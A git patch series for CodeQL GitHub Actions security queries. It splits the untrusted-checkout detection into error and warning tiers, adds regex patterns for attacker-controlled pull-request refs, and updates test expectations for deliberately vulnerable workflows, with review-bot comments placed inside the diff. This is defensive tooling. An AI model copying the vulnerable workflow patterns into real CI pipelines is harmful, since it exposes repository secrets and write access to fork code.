+class GhSHACheckout extends PRHeadCheckoutStep instanceof Run {
+ GhSHACheckout() {
+ exists(string line |
+ this.getScript().splitAt("\n") = line and
+ line.regexpMatch(".*gh\\s+pr\\s+checkout.*") and
+ (
+ containsHeadSHA(line)
+ or
+ exists(string varname |
+ containsHeadSHA(this.getInScopeEnvVarExpr(varname).getExpression()) and
+ exists(line.regexpFind(varname, _, _))
+ )
+ )
+ )
+ }
+}
+
+/** An If node that contains an actor, user or label check */
+class ControlCheck extends If {
+ ControlCheck() {
+ exists(
+ Utils::normalizeExpr(this.getCondition())
+ .regexpFind([
+ "\\bgithub\\.actor\\b", // actor
+ "\\bgithub\\.triggering_actor\\b", // actor
+ "\\bgithub\\.event\\.comment\\.user\\.login\\b", //user
+ "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", //user
+ "\\bgithub\\.event\\.pull_request\\.labels\\b", // label
+ "\\bgithub\\.event\\.label\\.name\\b" // label
+ ], _, _)
+ )
+ }
+}
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 3800ce9e85ca..380cfdbd8583 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
library: true
warnOnImplicitThis: true
name: githubsecuritylab/actions-all
-version: 0.0.19
+version: 0.0.20
dependencies:
codeql/util: ^0.2.0
codeql/yaml: ^0.1.2
diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql
deleted file mode 100644
index c9cbb0ab13c7..000000000000
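Review bot: `GitMutableRefCheckout` and `GitSHACheckout` only consider script lines matching `git\s+(fetch|pull)`, so the common two-step form — a generic `git fetch origin +refs/pull/*/head:refs/remotes/origin/pr/*` followed by `git checkout ${{ github.event.pull_request.head.sha }}` (or `origin/pr/${{ github.event.number }}`) — is missed, because the PR expression sits on the checkout line, which neither regex looks at. Extending both to `line.regexpMatch(".*git\\s+(fetch|pull|checkout).*")` closes that gap without hurting precision, since the line must still contain a PR-controlled ref or SHA. The env-var fallback in the `Git*` and `Gh*` classes runs `line.regexpFind(varname, _, _)` with the variable name as an unanchored regex, so a variable named `PR` is "referenced" by any line containing `PRINT` or `REPO_PRIVATE`; `line.regexpFind("\\$\\{?" + varname + "\\b", _, _)` matches the actual `$PR`/`${PR}` uses instead. `ControlCheck` fires on any mention of `github.actor` and friends, including conditions such as `github.actor != 'dependabot[bot]'` that do not gate on trust; that behaviour is inherited from the deleted query, but it now also suppresses the `error`/`high`-precision variant, so a note on the class, e.g. `// Heuristic: any condition mentioning an actor/user/label is treated as a gate, even if it does not compare against a trusted set`, would set expectations.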
--- a/ql/src/Security/CWE-829/UntrustedCheckout.ql
+++ /dev/null
@@ -1,150 +0,0 @@
-/**
- * @name Checkout of untrusted code in trusted context
- * @description Priveleged workflows have read/write access to the base repository and access to secrets.
- * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment
- * that is able to push to the base repository and to access secrets.
- * @kind problem
- * @problem.severity warning
- * @precision medium
- * @security-severity 9.3
- * @id actions/untrusted-checkout
- * @tags actions
- * security
- * external/cwe/cwe-829
- */
-
-import actions
-import codeql.actions.DataFlow
-
-/** An If node that contains an actor, user or label check */
-class ControlCheck extends If {
- ControlCheck() {
- exists(
- Utils::normalizeExpr(this.getCondition())
- .regexpFind([
- "\\bgithub\\.actor\\b", // actor
- "\\bgithub\\.triggering_actor\\b", // actor
- "\\bgithub\\.event\\.comment\\.user\\.login\\b", //user
- "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", //user
- "\\bgithub\\.event\\.pull_request\\.labels\\b", // label
- "\\bgithub\\.event\\.label\\.name\\b" // label
- ], _, _)
- )
- }
-}
-
-bindingset[s]
-predicate containsHeadRef(string s) {
- exists(
- Utils::normalizeExpr(s)
- .regexpFind([
- "\\bgithub\\.event\\.number\\b", // The pull request number.
- "\\bgithub\\.event\\.issue\\.number\\b", // The pull request number on issue_comment.
- "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", // The ref name of head.
- "\\bgithub\\.event\\.pull_request\\.head\\.sha\\b", // The commit SHA of head.
- "\\bgithub\\.event\\.pull_request\\.id\\b", // The pull request ID.
- "\\bgithub\\.event\\.pull_request\\.number\\b", // The pull request number.
- "\\bgithub\\.event\\.pull_request\\.merge_commit_sha\\b", // The SHA of the merge commit.
- "\\bgithub\\.head_ref\\b", // The head_ref or source branch of the pull request in a workflow run.
- "\\bgithub\\.event\\.workflow_run\\.head_branch\\b", // The branch of the head commit.
- "\\bgithub\\.event\\.workflow_run\\.head_commit\\.id\\b", // The SHA of the head commit.
- "\\bgithub\\.event\\.workflow_run\\.head_sha\\b", // The SHA of the head commit.
- "\\benv\\.GITHUB_HEAD_REF\\b", "\\bgithub\\.event\\.check_suite\\.after\\b",
- "\\bgithub\\.event\\.check_suite\\.head_sha\\b",
- "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b",
- "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b",
- "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b",
- "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b",
- "\\bgithub\\.event\\.check_run\\.check_suite\\.after\\b",
- "\\bgithub\\.event\\.check_run\\.check_suite\\.head_sha\\b",
- "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b",
- "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b",
- "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b",
- "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b",
- "\\bgithub\\.event\\.check_run\\.head_sha\\b",
- "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b",
- "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b",
- "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.id\\b",
- "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.number\\b",
- // heuristics
- "\\bhead\\.sha\\b", "\\bhead\\.ref\\b", "\\bpr_number\\b", "\\bpr_head_sha\\b"
- ], _, _)
- )
-}
-
-/** Checkout of a Pull Request HEAD ref */
-abstract class PRHeadCheckoutStep extends Step { }
-
-/** Checkout of a Pull Request HEAD ref using actions/checkout action */
-class ActionsCheckout extends PRHeadCheckoutStep instanceof UsesStep {
- ActionsCheckout() {
- this.getCallee() = "actions/checkout" and
- (
- // ref argument contains the head ref
- exists(Expression e |
- containsHeadRef(e.getExpression()) and
- DataFlow::hasLocalFlowExpr(e, this.getArgumentExpr("ref"))
- )
- or
- // 3rd party actions returning the PR head sha/ref
- exists(UsesStep head |
- head.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and
- DataFlow::hasLocalFlowExpr(head, this.getArgumentExpr("ref"))
- )
- or
- // heuristic base on the step id and field name
- exists(StepsExpression e |
- this.getArgumentExpr("ref") = e and
- (
- e.getStepId().matches(["%sha%", "%head%", "branch"]) or
- e.getFieldName().matches(["%sha%", "%head%", "branch"])
- )
- )
- )
- }
-}
-
-/** Checkout of a Pull Request HEAD ref using git within a Run step */
-class GitCheckout extends PRHeadCheckoutStep instanceof Run {
- GitCheckout() {
- exists(string line |
- this.getScript().splitAt("\n") = line and
- line.regexpMatch(".*git\\s+fetch.*") and
- (
- containsHeadRef(line)
- or
- exists(string varname |
- containsHeadRef(this.getInScopeEnvVarExpr(varname).getExpression()) and
- exists(line.regexpFind(varname, _, _))
- )
- )
- )
- }
-}
-
-/** Checkout of a Pull Request HEAD ref using gh within a Run step */
-class GhCheckout extends PRHeadCheckoutStep instanceof Run {
- GhCheckout() {
- exists(string line |
- this.getScript().splitAt("\n") = line and
- line.regexpMatch(".*gh\\s+pr\\s+checkout.*") and
- (
- containsHeadRef(line)
- or
- exists(string varname |
- containsHeadRef(this.getInScopeEnvVarExpr(varname).getExpression()) and
- exists(line.regexpFind(varname, _, _))
- )
- )
- )
- }
-}
-
-from Workflow w, PRHeadCheckoutStep checkout
-where
- w.isPrivileged() and
- w.getAJob().(LocalJob).getAStep() = checkout and
- not exists(ControlCheck check |
- checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check
- )
-select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow."
diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.md b/ql/src/Security/CWE-829/UntrustedCheckoutError.md
similarity index 100%
rename from ql/src/Security/CWE-829/UntrustedCheckout.md
rename to ql/src/Security/CWE-829/UntrustedCheckoutError.md
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutError.ql b/ql/src/Security/CWE-829/UntrustedCheckoutError.ql
new file mode 100644
index 000000000000..604acf71cc7b
--- /dev/null
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutError.ql
@@ -0,0 +1,28 @@
+/**
+ * @name Checkout of untrusted code in trusted context
+ * @description Priveleged workflows have read/write access to the base repository and access to secrets.
+ * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment
+ * that is able to push to the base repository and to access secrets.
+ * @kind problem
+ * @problem.severity error
+ * @precision high
+ * @security-severity 9.3
+ * @id actions/untrusted-checkout
+ * @tags actions
+ * security
+ * external/cwe/cwe-829
+ */
+
+import actions
+import codeql.actions.security.UntrustedCheckoutQuery
+import codeql.actions.security.PoisonableSteps
+
+from Workflow w, PRHeadCheckoutStep checkout
+where
+ w.isPrivileged() and
+ w.getAJob().(LocalJob).getAStep() = checkout and
+ checkout.getAFollowingStep() instanceof PoisonableStep and
+ not exists(ControlCheck check |
+ checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check
+ )
+select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow."
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutWarning.md b/ql/src/Security/CWE-829/UntrustedCheckoutWarning.md
new file mode 100644
index 000000000000..e69de29bb2d1
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutWarning.ql b/ql/src/Security/CWE-829/UntrustedCheckoutWarning.ql
new file mode 100644
index 000000000000..d8dfd69ad28e
--- /dev/null
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutWarning.ql
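Review bot: `@id actions/untrusted-checkout` is reused verbatim from the deleted `UntrustedCheckout.ql` and, per the `UntrustedCheckoutWarning.ql` hunk further down, by the new Warning query as well, so the pack now has two queries with one id; query ids are meant to be unique within a pack and code scanning keys rule ids and alert fingerprints on them, so the two result sets would be merged or one would shadow the other. Use a distinct id per tier, e.g. `@id actions/untrusted-checkout/critical` here, and keep the legacy id on whichever query should inherit existing alerts. The `@precision high` claim rests on `checkout.getAFollowingStep() instanceof PoisonableStep`; say so in the header so later edits keep the two in step, e.g. `// High precision: only reported when a build/command-execution step follows the untrusted checkout in the same job.` `Priveleged` in `@description` should read `Privileged`.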
@@ -0,0 +1,28 @@
+/**
+ * @name Checkout of untrusted code in trusted context
+ * @description Priveleged workflows have read/write access to the base repository and access to secrets.
+ * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment
+ * that is able to push to the base repository and to access secrets.
+ * @kind problem
+ * @problem.severity warning
+ * @precision medium
+ * @security-severity 5.3
+ * @id actions/untrusted-checkout
+ * @tags actions
+ * security
+ * external/cwe/cwe-829
+ */
+
+import actions
+import codeql.actions.security.UntrustedCheckoutQuery
+import codeql.actions.security.PoisonableSteps
+
+from Workflow w, PRHeadCheckoutStep checkout
+where
+ w.isPrivileged() and
+ w.getAJob().(LocalJob).getAStep() = checkout and
+ not checkout.getAFollowingStep() instanceof PoisonableStep and
+ not exists(ControlCheck check |
+ checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check
+ )
+select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow."
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index c431636c96a0..c5a94e35d4be 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
---
library: false
name: githubsecuritylab/actions-queries
-version: 0.0.19
+version: 0.0.20
groups: - actions - queries
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml
index 2f39bfd307aa..e73548895d37 100644
--- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml
@@ -17,7 +17,7 @@ jobs:
path: foo - name: Run command
run: |
- ./foo/cmd
+ sh foo/cmd
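Review bot: `@id actions/untrusted-checkout` here is the same id `UntrustedCheckoutError.ql` declares in the hunk above, and the `@name`/`@description` are word-for-word identical, so results from the two variants are indistinguishable in a SARIF upload and, if query ids are required to be unique within a pack (as I believe they are), the pack will fail to resolve; give this one its own id and name, e.g. `@id actions/untrusted-checkout/medium` and `@name Checkout of untrusted code in trusted context (no poisonable step found)`. Its help file `UntrustedCheckoutWarning.md` is added as the empty blob (`index 000000000000..e69de29bb2d1`), so alerts from this query will carry no remediation text; at minimum copy `UntrustedCheckoutError.md`. The `where` clause differs from the error variant only by `not checkout.getAFollowingStep() instanceof PoisonableStep`, and `getAFollowingStep()` scans the same job only, so a checkout whose files are consumed by a later job via `needs:` or an uploaded artifact lands here rather than in the error tier; that is worth a line in the doc comment, e.g. `// Lower tier: no poisonable step follows in this job; downstream jobs are not inspected.` `Priveleged` in the description should read `Privileged`.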
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml
index 31fa30175512..ac970fff8404 100644
--- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml
@@ -15,7 +15,7 @@ jobs:
name: artifact_name
workflow: wf.yml - name: Run command
- run: ./cmd
+ run: sh cmd
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected
index 3d1df408c3b4..193eee3b66cc 100644
--- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected
+++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected
@@ -1,8 +1,8 @@ edges | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | 
@@ -18,9 +18,9 @@ nodes | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | semmle.label | ./foo/cmd\n | +| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | semmle.label | sh foo/cmd\n | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | semmle.label | ./cmd | +| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | semmle.label | sh cmd | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | semmle.label | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected index 5bea5c7e52cf..2819bf62fdf6 100644 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected 
@@ -1,8 +1,8 @@ edges | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | 
@@ -18,9 +18,9 @@ nodes | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | semmle.label | ./foo/cmd\n | +| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | semmle.label | sh foo/cmd\n | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | semmle.label | ./cmd | +| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | semmle.label | sh cmd | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | semmle.label | Run Step | 
@@ -43,8 +43,8 @@ subpaths
 #select
 | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build |
 | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | ./x.py build -j$(nproc) --compiler gcc --skip-build |
-| .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | ./foo/cmd\n |
-| .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | ./cmd |
+| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n |
+| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | sh cmd |
 | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd |
 | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n |
 | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n |
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref
deleted file mode 100644
index b0c41e712e50..000000000000
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref
+++ /dev/null
@@ -1 +0,0 @@
-Security/CWE-829/UntrustedCheckout.ql
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.expected
new file mode 100644
index 000000000000..ff65e1658125
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.expected
@@ -0,0 +1,6 @@
+| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
+| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
+| .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
+| .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
+| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
+| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref
new file mode 100644
index 000000000000..1192fcfe6168
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref
@@ -0,0 +1 @@
+Security/CWE-829/UntrustedCheckoutError.ql
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.expected
similarity index 79%
rename from ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected
rename to ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.expected
index 4913ed2d1008..628234f7e8b4 100644
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.expected
@@ -1,6 +1,4 @@
 | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
@@ -18,10 +16,6 @@
 | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
-| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref
new file mode 100644
index 000000000000..8c77a95b48c7
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref
@@ -0,0 +1 @@
+Security/CWE-829/UntrustedCheckoutWarning.ql
From addedd0e2aa26f630e766ad00b589ff19fd484e9 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Sat, 4 May 2024 23:29:55 +0200
Subject: [PATCH 230/707] Comment out unused source
---
 .../codeql/actions/dataflow/FlowSources.qll | 33 +++++++++----------
 1 file changed, 16 insertions(+), 17 deletions(-)
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll
index 6dd9b5d36171..a97dc8405f49 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSources.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll
@@ -76,23 +76,22 @@ private predicate textEvent(string context) {
 )
 }
 
-bindingset[context]
-private predicate repoNameEvent(string context) {
- exists(string reg |
- reg =
- [
- // repo name
